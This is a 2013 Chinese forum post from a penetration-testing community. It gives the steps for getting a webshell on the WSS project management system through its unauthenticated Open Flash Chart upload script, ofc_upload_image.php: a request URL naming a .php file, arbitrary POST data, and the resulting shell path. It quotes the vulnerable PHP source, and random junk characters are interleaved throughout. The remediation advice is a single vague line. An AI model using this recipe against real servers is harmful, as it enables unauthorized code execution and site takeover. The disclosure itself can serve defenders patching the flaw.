中国网络渗透测试联盟

标题: WSS项目管理系统Post get shell [打印本页]

作者: admin    时间: 2013-2-23 12:38
标题: WSS项目管理系统Post get shell
POST 数据漏洞文件执行任意后缀文件保存
/ U& ^9 J. R3 _2 j) I% G 漏洞文件/chart/php-ofc-library/ofc_upload_image.php
  v( P6 H( z7 a3 [! \* D8 b6 Y+ D* u4 J5 n0 I5 h4 _6 }
利用:
, c8 A2 k. e$ P& O2 R% R/chart/php-ofc-library/ofc_upload_image.php?name=hfy.php hfy.php 文件名; x3 l" A9 ^4 _+ t" l
( f- H& {" t" x/ l% o) n
Post任意数据- l. O" p( L4 i( X* C# [1 _$ h, y
保存位置http://localhost/chart/tmp-upload-images/hfy.php
! _7 v' W# B7 b. n! Q4 y[attach]201[/attach]  w) o/ A  a  T) k. M% P+ S; g
[attach]202[/attach]
0 E: \, B* m' A" q/ f最新版wss漏洞文件,即使是收费版本也有的,在新浪商店部署的demo~0 h: ~# F- D& x  _( y' `' l  f

5 \4 j5 e! I( d; r' b<?php: S; n( p" w7 C9 h

: H+ U' t9 R4 k6 T7 q//
+ q3 D5 D* N$ Y3 x// In Open Flash Chart -> save_image debug mode, you5 H1 q6 q) k7 z( ?1 y
// will see the 'echo' text in a new window.+ ?) m) d  `, S0 P
//
7 X6 I4 e1 |, W. T+ M/ C* i# t  Y4 c
/*
, T3 \$ J) U$ |; a
. E0 o$ [7 d5 @6 ]print_r( $_GET );
( c/ d7 o! W7 M0 P# {/ zprint_r( $_POST );7 [! ^1 i' L: F* f/ y+ L. A& o
print_r( $_FILES );! R( y5 D4 r3 T
: e4 N! o$ p8 C# q6 \2 E
print_r( $GLOBALS );/ g, i( V. P; a, y
print_r( $GLOBALS["HTTP_RAW_POST_DATA"] );
+ d8 [, @( {4 J) n4 E/ _1 k9 L' m9 q" l
*/* X. {7 L! I5 e6 l! l7 Q
// default path for the image to be stored //
/ f3 s9 g+ q- ]1 C. B# `: Q& l5 ?$default_path = '../tmp-upload-images/';) x2 r& u- U+ K1 ~3 X: x
; ?& _9 }8 n/ T" w
if (!file_exists($default_path)) mkdir($default_path, 0777, true);
4 r+ t4 H+ U7 k) u5 P; u. M
! R+ K. n& C/ |// full path to the saved image including filename //, @& K# y0 v# O9 |  `
$destination = $default_path . basename( $_GET[ 'name' ] );
0 p% ]; \- i7 N0 T! ?9 s! b) D% D  m- K6 r8 `& p! r) y2 N# u8 ?" ~
echo 'Saving your image to: '. $destination;
5 F& R& M& `2 G+ o6 |// print_r( $_POST );
* M8 A2 @; Q) T! I5 G// print_r( $_SERVER );) U7 |7 c9 r! d8 K: C, H/ A
// echo $HTTP_RAW_POST_DATA;
6 I2 I! p3 ?- R0 u2 `
. _0 H0 Z9 N6 i; P1 E" q. Z//( ?" M% x2 H+ O1 ]: H6 ?
// POST data is usually string data, but we are passing a RAW .png
8 j$ u/ @4 G  N7 q// so PHP is a bit confused and $_POST is empty. But it has saved; v" l8 @% U: }& F' `
// the raw bits into $HTTP_RAW_POST_DATA
% c3 u4 z: H- k! @0 ~  l//
! F- c; v' s8 E/ Z  V& s
# H' e0 J4 z2 D$jfh = fopen($destination, 'w') or die("can't open file");2 N& H: F4 g+ [2 R! g  Y- s4 Z( t
fwrite($jfh, $HTTP_RAW_POST_DATA);" U4 H: D- `" _0 R
fclose($jfh);
/ I. y# y7 v2 J4 s9 c4 e
! r, j0 a" l0 e//3 J* D' q- Z* _) Z/ V) T2 a& `
// LOOK:
3 }+ O& j. C. u0 D1 p7 C3 q: Z//
4 m* f: h( Z' G7 b! m5 iexit();% e' u3 ~  A, n1 ]- Q* r  ]: N( Z! i# b
//
# t& p% d" t5 z3 B: w) c# B// PHP5:
: V5 r0 b% e) N//+ _+ a. Z: ?- v8 }: m
9 K& G5 a" w) \2 H
: [* A. u! I& y! ~! M
// default path for the image to be stored //) J8 ?- T& w1 `6 h# w
$default_path = 'tmp-upload-images/';  j$ v' H. }7 M0 `, ]) E3 |

5 R5 m! y0 n) Q( zif (!file_exists($default_path)) mkdir($default_path, 0777, true);9 L) v$ i0 t; V; P, i$ Z' N
, D& X+ p- A1 Z4 ~! B
// full path to the saved image including filename //
$ N- T4 T5 ]* O5 O$destination = $default_path . basename( $_FILES[ 'Filedata' ][ 'name' ] );
/ b* T3 R2 d) y" T8 J2 w' h' _  c) i5 g. Q8 l! e& G2 T
// move the image into the specified directory //$ u9 M7 Y. G1 ~7 \- {
if (move_uploaded_file($_FILES[ 'Filedata' ][ 'tmp_name' ], $destination)) {
; }. ?8 d" T- v. d    echo "The file " . basename( $_FILES[ 'Filedata' ][ 'name' ] ) . " has been uploaded;";
' U" Z% |2 |) Y. K} else {
4 i& X4 {. V( r) h    echo "FILE UPLOAD FAILED";- }! I' F2 _' j
}* h" o# u6 x+ \) a# f! _

0 x9 r1 M5 ^4 l! S6 a, ]5 n, E* D  z' b
?>) O7 ?# \  ]( X) n+ e

7 I) @- q  k" i- _& a5 I! Q7 ]! ^$ p

  h* y' Y+ L1 ?% _* a
/ E4 e* h' ~4 y. U/ D[attach]203[/attach]
3 s0 p7 q$ y2 ~% ]
" j! \' `3 O" [" o6 u$ P/ i修复方案:
5 Y4 A; A! ^$ U9 \这个漏洞文件就是个杯具,怎么破,加权限验证,后缀等验证~,自己搞
5 P4 x4 q/ N$ d2 l) h6 s( i6 V3 C6 Z6 h$ @/ V, y

, ^/ W0 v* P  G5 [( t
- H4 u* l2 |  n1 _2 K
/ p: c% `9 }/ a$ n




欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2